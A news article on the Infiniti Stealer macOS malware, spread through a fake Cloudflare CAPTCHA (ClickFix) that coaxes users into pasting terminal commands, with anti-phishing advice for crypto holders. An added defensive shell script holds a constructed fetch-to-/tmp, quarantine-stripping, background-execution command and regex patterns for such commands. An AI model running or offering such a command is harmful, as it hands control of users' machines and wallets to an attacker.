Infiniti Stealer is coming: targeting macOS and crypto assets

智者解密
4 hours ago

On March 30, 2026, the security agency GoPlus Security disclosed a new type of malware incident specifically targeting macOS users—Infiniti Stealer. Unlike traditional attacks that rely on technical vulnerabilities, this time, the attackers chose to disguise themselves as a Cloudflare CAPTCHA page that we encounter almost every day, guiding users to execute malicious commands locally through a seemingly “normal” security process. On the surface, it is an attempt to verify that you are not a robot, but in reality, it is gradually dismantling the system's defenses.

GoPlus Security's analysis points out that Infiniti Stealer's primary targets are crypto wallets and various sensitive credentials (this conclusion currently comes from a single source and needs continuous verification), which means that the macOS territory, long considered “relatively secure,” is being systematically penetrated by organized attackers. For cryptocurrency users who are increasingly dependent on desktop wallets, browser plugins, and exchange logins, this is not just a system security incident but a signal redefining the “security boundary” in the era of cryptocurrency.

A Trapped Page Disguised as Cloudflare Verification

In this incident, the social engineering scenario named ClickFix serves as the entry point of the entire attack chain. When a user visits a website embedded with attack code, a highly realistic Cloudflare CAPTCHA interface pops up: the layout, copy, and branding are almost identical to the real experience, but the underlying logic has been quietly “replaced.”

Traditional Cloudflare verification usually involves clicking on images, checking boxes, or waiting for the browser to complete the check automatically, while ClickFix adds an extra step—prompting the user to copy a command that appears to “fix the local network/verification environment” and paste it into the macOS terminal to execute. For many users accustomed to copying commands from tutorials, this step does not automatically trigger suspicion; rather, it is seen as an “advanced user option.”

The key to social engineering is not to break through technical defenses but to rewrite users' understanding of security processes. The attackers understand that Cloudflare is synonymous with “safety” and “protection” in the minds of users, so they disguise malicious behavior under the trusted branding context, turning terminal operations that originally required technical barriers into “verification actions” voluntarily completed by users.

Compared to traditional phishing emails and fake login pages, the danger of this model is that it no longer requires users to step out of familiar online scenarios; instead it embeds itself seamlessly into the daily browsing experience. You are still visiting a site that looks “normal” and still going through the “usual” Cloudflare verification; only this time, the price of verification is handing over control of your system.

A Streamlined Attack Chain to Take Down macOS in Two Steps

According to GoPlus Security's technical analysis, the Infiniti Stealer attack chain has been condensed into two key steps, both streamlined and efficient and able to avoid most of the risk signals an ordinary user would notice. The first step uses the command the user was induced to paste into the terminal to remove the macOS quarantine attribute from the downloaded file.

macOS automatically adds a quarantine tag to files downloaded from unknown sources or the internet to trigger extra verification or warnings. The command provided by ClickFix essentially helps attackers complete this “unlock” operation: once the quarantine attribute is removed, the default protective prompts from the system will weaken or disappear, allowing the malicious payload to be executed in a more “natural” way. This step, seemingly a “network issue fix” or “verification completion,” is fundamentally dismantling the first security barrier designed by Apple for ordinary users.

The second step involves writing the malicious payload into the /tmp directory and executing it quietly in the background. As /tmp is a temporary file directory, it does not stand out in most users' security instincts, but precisely because of this, unusual activities here are often hard to detect. The entire process lacks obvious pop-up warnings, and no further confirmation from the user is required, allowing the attack chain to close rapidly in these two steps.

The danger of this pathway is that once users complete that seemingly harmless click-and-paste action, there is almost no opportunity for human intervention. Traditional attacks often require multiple inducements or confirmations, while Infiniti Stealer folds every critical action into a single terminal execution, minimizing the window for hesitation and second thoughts.

Crypto Wallets as Prey: Dual Exposure of Assets and Privacy

In the currently available information, GoPlus Security clearly states that the main targets of Infiniti Stealer are crypto wallets and sensitive credentials, but this conclusion comes from a single source and still needs cross-verification against other intelligence. Even with limited information, however, as long as the targets fall within the scope of cryptocurrency-related data, the potential damage is already enough to constitute systemic risk.

For ordinary cryptocurrency users, desktop wallets, exchange login credentials, browser-saved authentication data, and even offline-stored recovery mnemonics can lead to direct financial loss if stolen: assets can be transferred instantly and dumped across chains, making the whole process extremely hard to reverse. At the same time, these credentials are often tied to accounts on multiple platforms, so after the funds are stolen attackers can reuse the identity data for secondary infiltration or extortion.

The deeper risk is long-term exposure. Once a mnemonic phrase has leaked, even a wallet whose current balance is low remains compromised: if new assets are later sent to the same address, the attackers can return to “harvest” them at any time. With cross-border tracking and judicial cooperation still limited, the high liquidity and global transferability of crypto assets make such attacks highly cost-effective; once high-net-worth users are targeted, the returns far exceed those of traditional information theft.

This is why cryptocurrency holders are increasingly viewed as priority targets for attackers. Compared to ordinary internet users, cryptocurrency participants often store a higher density of assets and keys on a single device, making the marginal return of successful attacks extremely high while the difficulty of accountability and recovery costs are significantly greater. This makes attacks like Infiniti Stealer, specifically targeting macOS and cryptocurrency scenarios, have clear economic motives.

The Myth of macOS Shattered: From System Myth to Asset Battleground

For a considerable time, the belief that “macOS is safer and less prone to viruses” was widely accepted as market consensus. Part of the reason is that macOS has a relatively small market share, making attackers more willing to focus their efforts on the Windows territory. Recently, however, malware incidents targeting macOS have shown an upward trend, and Infiniti Stealer is just one example, but one that is enough to tear a corner off the myth.

As the cryptocurrency ecosystem expands and more funds and applications migrate from traditional finance onto the chain, the desktop becomes an important entry point for interacting with it. The popularity of cross-platform wallets, browser-extension wallets, and desktop trading clients has rapidly increased the value of on-chain assets carried by macOS devices. For attackers calculating return on investment, continuing to ignore this group has become unprofitable.

From an economic motivation perspective, attackers turning to macOS is not because they have discovered better technical vulnerabilities, but because this space gathers enough high-value targets: developers, early cryptocurrency investors, professional traders, users with high privacy requirements, etc. No matter how strong the default protections at the system level, they cannot offset the temptation brought by the high asset density of this group.

In this context, the “security boundaries” are being redefined: shifting from a past emphasis on “system protection”—relying on operating system sandboxes, signature verification, and permission management—to focusing on “asset and identity protection.” The sense of superiority of the operating system cannot replace the strict constraints on private key management, credential storage, and signing behaviors. The Infiniti Stealer incident serves as a reminder of a harsh reality: as long as your device carries enough on-chain value, there is no meaningful “secure system.”

Four Don'ts: Turning Security Awareness from Intuition to Rules

In response to the Infiniti Stealer incident, GoPlus Security released security recommendations centered around “4 Don'ts,” condensing technical details into behavioral guidelines: its essence is not to teach you how to run antivirus tools, but to urge users to refrain from blind trust and impulsive actions. In a world increasingly reliant on copying commands, quick clicks, and one-click authorizations, this “slow down” attitude itself is the most important defense.

With regard to the ClickFix scenario, the foremost rule is: do not randomly paste commands of unknown origin into the terminal. Whether it’s packaged as “fix network,” “bypass verification,” or “enhance performance,” if you do not fully understand what the command is doing, you should not execute it on production environment devices. Secondly, do not blindly trust abnormal verification processes—Cloudflare, Google, and exchange verification codes have relatively fixed interaction patterns; if a “verification method” requests you to open the terminal, download a script, or install additional tools, you should immediately terminate it.
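The following POSIX shell script is an added example, not code from the article or from GoPlus Security's report. It turns the two-step chain described above (stripping the quarantine attribute, dropping a payload into /tmp and running it quietly in the background) and the rule “do not paste commands of unknown origin into the terminal” into a mechanical pre-paste check: the copied text is handed to the script as a string, nothing is executed, and the script reports which red flags the command carries. It needs only grep, so it runs on macOS as well as on any Linux shell. The regexes are heuristics rather than a signature for Infiniti Stealer, and every sample command, including the reserved `.invalid` domain, is constructed for illustration.

```shell
#!/bin/sh
# Paste guard: inspect a shell command string BEFORE it is executed and report
# the traits the article attributes to the ClickFix / Infiniti Stealer chain.
# Added defensive example, not code from GoPlus Security or the article.
# The regexes are heuristics and every sample command below is constructed.

# True (exit 0) when CMD matches the case-insensitive extended regex PATTERN.
matches() {
    printf '%s\n' "$1" | grep -Eqi -- "$2"
}

# Print one line per red flag found in CMD. Always exits 0; empty output = clean.
flag_command() {
    cmd=$1
    # Step 1 of the described chain: stripping com.apple.quarantine so the
    # downloaded file no longer triggers the Gatekeeper prompt. Merely listing
    # attributes (xattr -l) is not flagged.
    matches "$cmd" 'xattr[[:space:]]+.*(-[a-z]*c|com\.apple\.quarantine)' &&
        echo "strips the macOS quarantine attribute (defeats the Gatekeeper prompt)"
    # Step 2a: a payload written into the temporary directory ...
    matches "$cmd" '(>|-o|--output|tee)[[:space:]]*(/private)?/tmp/' &&
        echo "writes a file into /tmp"
    # Step 2b: ... and executed (or made executable) from there.
    matches "$cmd" '(^|[[:space:]&|;(])(sh|bash|zsh|chmod|open|nohup|source|\.|python[0-9.]*|perl|osascript)[[:space:]]+(\+x[[:space:]]+)?(/private)?/tmp/' &&
        echo "executes or marks executable a file under /tmp"
    # Remote content fed straight into an interpreter: the user never sees it.
    matches "$cmd" '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(sh|bash|zsh|python[0-9.]*|perl|osascript)([[:space:]]|$)' &&
        echo "pipes downloaded content directly into an interpreter"
    # Quiet background execution with output discarded: no pop-up, no confirmation.
    matches "$cmd" '(nohup[[:space:]]|>[[:space:]]*/dev/null|&[[:space:]]*$)' &&
        echo "runs in the background or discards its output"
    # Encoded or eval'd payloads hide what is really being run.
    matches "$cmd" 'base64[[:space:]]+(-d|-D|--decode)|(^|[[:space:];&|])eval[[:space:]]' &&
        echo "decodes or evals an obscured payload"
    return 0
}

# BLOCK if any flag fired, ALLOW otherwise: the answer to "should I paste this?".
verdict() {
    if flag_command "$1" | grep -q .; then echo BLOCK; else echo ALLOW; fi
}

# Number of distinct red flags found in CMD.
flag_count() {
    flag_command "$1" | grep -c .
}

# Constructed sample shaped like the chain the article describes. It is inert:
# the domain is reserved and never resolves, and nothing here is a real payload.
SAMPLE_CLICKFIX='curl -fsSL https://verify.example.invalid/fix.sh -o /tmp/.verify && xattr -c /tmp/.verify && nohup sh /tmp/.verify >/dev/null 2>&1 &'
# Constructed benign commands a macOS user might copy from documentation.
SAMPLE_INSPECT='xattr -l ~/Downloads/wallet.dmg'
SAMPLE_LIST='ls -la ~/Downloads'

main() {
    for c in "$SAMPLE_CLICKFIX" "$SAMPLE_INSPECT" "$SAMPLE_LIST"; do
        printf '%s\n  -> %s\n' "$c" "$(verdict "$c")"
        flag_command "$c" | sed 's/^/     * /'
    done
}

main
```

In practice the copied text goes to `verdict` (or `flag_command` for the reasons) instead of into a live shell; a BLOCK result means the command must be read and understood line by line before anything further happens, and a single quarantine-stripping or run-from-/tmp flag is already enough to stop.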

For cryptocurrency users, the “4 Don'ts” also need to extend into an executable daily checklist:

● Manage download sources: Try to obtain wallets and tools from official sites, trusted mirrors, or open-source repositories, and do not install critical software through search ads or ad-hoc links on social media.

● Tighten browser plugin permissions: Regularly clean out unused wallet plugins and script extensions, close unnecessary data reading permissions, and avoid having “installed on a whim” plugins lingering in high-permission positions.

● Slow down every signing action: Whether it's DApp authorization, cross-chain bridge operations, or NFT listings, verify the domain name, contract, and amount before signing, treating each signing as a “possibly irreversible transfer.”

Only when these rules are solidified into muscle memory can the “4 Don'ts” proposed by GoPlus Security transform from mere reminders post-incident into a lifestyle habit that truly reduces the incidence of future attacks.

The Next Wave of Offense and Defense: From Vulnerability Contests to Mind Contests

What Infiniti Stealer reflects is a clear trend: attacks are shifting from purely technical vulnerabilities to finely manipulating user behavior and psychological expectations. ClickFix stands out not for its complex 0-day or kernel exploitation but for its utilization of the trust in Cloudflare's brand, the “black box” sensation of the terminal, and the users' urgency to “quickly pass verification” to achieve a flanking breakthrough of the macOS defenses.

Looking forward, the macOS community and the cryptocurrency industry need to form closer collaborations in threat intelligence sharing, security tools, and user education. On one hand, security agencies like GoPlus Security should continuously publish verifiable attack samples and technical analyses, allowing browsers, wallets, antivirus, and system-level security tools to update defenses more swiftly; on the other hand, wallet and trading platforms need to embed more anti-social engineering designs at the product level, such as abnormal interaction reminders and environmental risk scoring mechanisms.

For individual participants, beyond the price cycles between bull and bear markets, viewing “security habits” as an equally important long-term investment as asset allocation is transitioning from an option to a necessity. You can reduce your position at price peaks or make regular investments at lows, but once you relax your vigilance at the behavioral level, the hard-earned accumulated accounts and assets can easily be wiped out in a single copy-paste or erroneous signature.

The real defense lies not in the operating system, browser, or wallet but in the behavioral bottom line you set for yourself.
